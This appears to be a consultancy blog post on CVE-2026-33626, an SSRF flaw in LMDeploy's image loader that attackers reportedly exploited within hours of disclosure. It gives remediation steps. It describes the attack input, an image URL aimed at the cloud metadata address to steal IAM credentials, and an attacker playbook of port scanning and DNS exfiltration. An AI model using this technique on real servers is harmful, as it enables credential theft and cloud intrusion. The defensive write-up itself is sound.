On April 21, security researchers disclosed CVE-2026-33626, a Server-Side Request Forgery vulnerability in LMDeploy — one of the most popular open-source toolkits for running your own vision-language and LLM inference servers. By April 22, attackers had already hit Sysdig's honeypot systems.
Not 13 days later. Not 13 weeks.
12 hours and 31 minutes.
No proof-of-concept code needed. The vulnerability was trivially exploitable the moment the advisory went public. And the target wasn't just LMDeploy — it was everything sitting behind it.
What LMDeploy Is and Who Uses It
If you've ever wanted to run your own large language model — Qwen, InternVL, a fine-tuned variant pulled from Hugging Face — LMDeploy is one of the tools you reach for. Developed by Shanghai AI Laboratory, it's a widely-used inference backend for organizations that want privacy-first AI: no prompts leaving to OpenAI, no API costs scaling with volume, no vendor lock-in.
It's popular with exactly the kind of orgs we work with — NGOs handling sensitive case files, health organizations under data sovereignty requirements, government teams that can't push data to third-party APIs, and small businesses that want AI without handing their internal queries to someone else's servers.
The pitch is correct. Self-hosting your AI is a legitimate strategy. CVE-2026-33626 is a reminder that it comes with infrastructure responsibilities most teams haven't fully accounted for.
What the Bug Actually Does
The vulnerable function — load_image() in lmdeploy/vl/utils.py — accepts image URLs from incoming API requests and fetches them. The problem: it does zero validation on where those URLs actually point. Including whether they point somewhere that should never be reachable from outside your network.
Send a crafted request with an image URL set to http://169.254.169.254/ — the AWS Instance Metadata Service endpoint — and LMDeploy fetches it and returns the contents. Inside that response: your instance's temporary IAM credentials.
The same credentials your GPU server uses to pull model weights from S3, write logs, and — if someone was lazy with IAM permissions — reach other AWS services across the account.
In Sysdig's honeypot observation, attackers ran a complete playbook in a single eight-minute session:
- Fetched IMDS to grab cloud credentials
- Port-scanned the internal network (Redis, MySQL, internal admin interfaces)
- Exfiltrated data through DNS to an out-of-band endpoint they controlled
One unsecured API request, and they had the keys to the cloud account.
Why AI Infrastructure Is a Different Kind of Target
Here's what makes this worse than a typical web server CVE: LLM inference nodes almost always run on GPU instances with overly broad IAM permissions. Not because teams are careless — because when you're standing up a model server for the first time, you're focused on getting the model loaded and serving requests. You need the instance to pull weights from S3. You need it to log somewhere. You give it an IAM role with enough access to make things work, tell yourself you'll tighten it later, and move on.
"Later" almost never happens.
Attackers are aware of this pattern. If you compromise an LLM inference server, you've often compromised the cloud account it lives in — because those servers sit on instances with permissions that were sized for convenience, not least privilege.
This is a playbook that's hardening: scan for exposed AI inference servers, find one running with default or generous credentials, use the model server as a pivot point into the broader cloud environment. CVE-2026-33626 is the first widely-exploited example. It won't be the last.
The 13-Hour Window Is the Real Lesson
The speed of exploitation matters beyond being a dramatic headline. It tells you something specific about how the threat model has shifted.
When a CVE drops for a traditional piece of infrastructure — Apache, Nginx, a common database — attackers typically need time to build or adapt exploit code. Sometimes days, sometimes weeks. With CVE-2026-33626, there was nothing to adapt. The vulnerability was exploitable by reading the advisory and constructing a single HTTP request. No tooling required.
The gap between "vulnerability published" and "vulnerability being actively exploited" is now measured in hours for AI tooling — specifically because the attack surface is new, defenders don't have established processes to handle it fast, and the primitives are often trivially simple.
If your patching cadence is monthly, or "we'll get to it this sprint," that cadence is no longer viable for AI infrastructure components. This class of software is being actively watched by people with bad intentions.
Who Is Exposed
Any LMDeploy deployment that:
- Is running version 0.12.0 or earlier with vision-language (VL) support enabled
- Can receive API requests from any network where an attacker could land — including the public internet, or any machine that could be compromised in a phishing attack
If your team spun up an InternVL or InternLM-XComposer deployment on a cloud instance at any point in the last year, you need to check this today.
What to Do Right Now
Upgrade to LMDeploy 0.12.1 or later. The patched version was released alongside the advisory. This is the fix.
Audit your IAM roles. Look at what your inference instance can actually access. S3 bucket access? Fine — scope it to the specific bucket holding your model weights. Cross-account assume-role? Almost certainly not needed. Admin-level permissions? Definitely not. The five minutes you spend scoping these down is worth more than any security tool you could buy.
Confirm your inference API is not internet-facing. It should only be reachable from your application layer. If it's currently behind nothing — no VPC boundary, no security group restriction, no auth middleware — fix that before anything else. The model API is not meant to be a public endpoint.
Enable IMDSv2 on your GPU instances. AWS IMDSv2 requires a session-oriented token to access instance metadata, which breaks basic SSRF attacks targeting it. This doesn't patch the underlying LMDeploy bug, but it significantly limits blast radius. On AWS, enabling it is a configuration change, not a rebuild.
Rotate credentials that may have been exposed. If your deployment was running a vulnerable version and had any internet-facing surface, treat your IAM credentials as potentially compromised. Rotate them. This is an annoying hour of work. It's better than the alternative.
The Broader Pattern
CVE-2026-33626 is notable as the first LLM inference toolkit vulnerability to be actively exploited in the wild. The self-hosted AI movement — running your own models for privacy, cost, and control — is genuinely good strategy. We've implemented it for clients and we stand behind it. But it introduces a class of infrastructure that most teams aren't yet treating as the attack surface it is.
AI model servers are not appliances you set up once and forget. They're networked services running on privileged cloud instances, serving complex codepaths that were written at speed by teams primarily focused on model quality, not security hardening.
The tradeoff is manageable. You can run your own AI stack securely. But getting there means treating your inference server with the same rigor you'd apply to anything else sitting between the internet and your cloud credentials.
If you're running self-hosted AI and want a quick review of how it's set up — network exposure, IAM scoping, model server configuration — that's a couple of hours of work we do regularly. Better to find the gaps now than have someone else find them in twelve.